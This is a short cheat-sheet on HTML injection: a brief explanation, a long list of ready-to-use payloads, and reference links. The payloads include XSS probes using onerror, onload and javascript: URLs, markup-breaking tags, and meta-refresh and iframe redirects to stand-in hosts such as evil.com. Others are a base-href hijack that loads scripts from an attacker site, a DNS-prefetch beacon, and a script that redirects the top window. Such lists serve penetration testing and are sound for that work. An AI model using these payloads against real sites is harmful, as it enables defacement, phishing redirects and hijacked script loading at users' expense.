HTML Injection

HTML injection is a type of attack where malicious HTML code is inserted into a website. This can lead to a variety of issues, from minor website defacement to serious data breaches. Unlike other web vulnerabilities, HTML injection targets the markup language that forms the backbone of most websites.

Payloads

testqwerty<b>12345</b>
<h1>Injected Heading</h1>
<b>test</b>
<marquee>test</marquee>
<font color=red>test</font>
<blink>test</blink>
<i>Italic</i>
<img src=x onerror=alert(1)>
</div><h1>Injected</h1>
</title><h1>Injected</h1>
</div><img src=x onerror=alert(1)>
<!-- injected -->
<!--<script>alert(1)</script>-->
"><b>bold</b>
</script><svg/onload=alert(1)>
"><iframe src="https://evil.com">
<a href="https://evil.com">Click me!</a>
<div style=position:absolute;width:100%;height:100%;background:red;z-index:9>Foobar</div>
<meta name=language content=1;https://evil.com HTTP-EQUIV=refresh />
<meta http-equiv="refresh" content="2; https://evil.com/" />
<base href="https://attacker-website.com">
<iframe src=//malicious-website.com/toplevel.html></iframe>
<link rel="dns-prefetch" href="//AAA.BBB.CCC.DDD.attacker.webserver.com">
<img src="x" onerror="alert(1)">
<svg/onload=alert(1)>
<iframe src="https://evil.com">
<body onload=alert(1)>
<video><source onerror=alert(1)>
<a href="javascript:alert(1)">click</a>
<input type="text" autofocus onfocus=alert(1)>

Base

<base href="https://attacker-website.com">
<script src="/assets/some-script.js"></script>

Iframe

<iframe src=//malicious-website.com/toplevel.html></iframe>
<html><head></head><body><script>top.window.location = "https://malicious-website.com/pwned.html"</script></body></html>

References

HTML Injection | Application Security Cheat Sheet0xn3va.gitbook.io

Crafting Emails with HTML InjectionTrustedSec

The Ultimate Guide to Finding HTML Injection Vulnerabilities — Guaranteed Method + Top Payloads & ToolsSpyboy blog